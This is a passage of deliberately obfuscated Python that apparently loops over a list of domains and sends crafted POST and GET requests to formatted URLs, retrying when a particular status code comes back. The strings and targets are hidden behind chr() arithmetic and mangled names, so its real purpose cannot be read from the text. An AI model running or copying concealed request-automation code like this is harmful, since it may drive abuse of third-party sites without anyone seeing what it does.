_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwl
m<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));_____________________ymckkukhgbvc=str("".join(chr(__RSV) for __RSV in [((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)]));______________________thoquygtdlhk=str("".join(chr(__RSV) for __RSV in 
[((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)]));___________________________________wwyksdhmospv=((((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)));____________________________________liacevohsqep=((((((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))
def check(________________________sdjxilhjdjtv):
try :
global dom
global to
global version
to =str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+(__mdujlsfdmxmj<<__mdujlsfdmxmj)+(___jalaznnmibpy<<(_oaowtpxvobjz**_oaowtpxvobjz))+(____oumrhwochlkn<<(_oaowtpxvobjz**_oaowtpxvobjz))+(__mdujlsfdmxmj<<____oumrhwochlkn)+(______hotkgbptqejb<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]))
version =(___jalaznnmibpy+____oumrhwochlkn)
_________________________vhusjytszcli=shuffle_Fox(___________onielzvjdokg)
for dom in _________________________vhusjytszcli:
if ('___________________________vuycrqbiwbsp' in locals()): del ___________________________vuycrqbiwbsp
if ( version !=(___jalaznnmibpy+____oumrhwochlkn)): version =(___jalaznnmibpy+____oumrhwochlkn)
try :
___________________________vuycrqbiwbsp=str(base64.b64encode(''.join(dom.split(str("".join(chr(__RSV) for __RSV in [(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])))[(_oaowtpxvobjz**_oaowtpxvobjz):]).upper().encode(str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)])))).decode(str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)]))))
if (str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)])) in ___________________________vuycrqbiwbsp):
___________________________vuycrqbiwbsp=___________________________vuycrqbiwbsp.replace(str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)])),str("".join(chr(__RSV) for __RSV in [])))
if (str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])) in ___________________________vuycrqbiwbsp):
___________________________vuycrqbiwbsp=___________________________vuycrqbiwbsp.replace(str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])),str("".join(chr(__RSV) for __RSV in [])))
version =str( version )+str("".join(chr(__RSV) for __RSV in [(_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]))+___________________________vuycrqbiwbsp
_______________________________zqzpnanfxldd={str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))])):str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaow
tpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]))}
________________________________dhapbpidytke=requests.post(_________________bpssooleeakr.format(________________________sdjxilhjdjtv, dom , to , version ), data =_______________________________zqzpnanfxldd, headers = headers , timeout =((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))))
_________________________________uhrqfcnavgmb=________________________________dhapbpidytke.status_code
__________________________________vsbiobxphiqc=content_Fox(________________________________dhapbpidytke)
except :
__________________________________vsbiobxphiqc=str("".join(chr(__RSV) for __RSV in []))
_________________________________uhrqfcnavgmb=((()==[])+(()==[]))
if (int(_________________________________uhrqfcnavgmb)==((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+(___________________________________wwyksdhmospv<<(_oaowtpxvobjz**_oaowtpxvobjz))+(____________________________________liacevohsqep<<(_oaowtpxvobjz**_oaowtpxvobjz)))):
try :
_____________________________________ekmlqimmjqhr403=requests.get(__________________mkgflhargygg.format(________________________sdjxilhjdjtv), headers = headers , timeout =((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))))
except :
_____________________________________ekmlqimmjqhr403=requests.get(__________________mkgflhargygg.format(________________________sdjxilhjdjtv), headers = headers , timeout =(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm))
try :
________________________________dhapbpidytke=requests.post(_________________bpssooleeakr.format(________________________sdjxilhjdjtv, dom , to , version ), data =_______________________________zqzpnanfxldd, headers = headers , timeout =((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))))
__________________________________vsbiobxphiqc=content_Fox(________________________________dhapbpidytke)
except :
__________________________________vsbiobxphiqc=str("".join(chr(__RSV) for __RSV in []))
if (str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbp
tqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))])) in __________________________________vsbiobxphiqc):
break
elif (str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkp
wlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))])) in __________________________________vsbiobxphiqc) and str("".join(chr(__RSV) for __RSV in [((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])) in ________________________sdjxilhjdjtv:
________________________sdjxilhjdjtv=________________________sdjxilhjdjtv.replace(str("".join(chr(__RSV) for __RSV in [((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])),str("".join(chr(__RSV) for __RSV in 
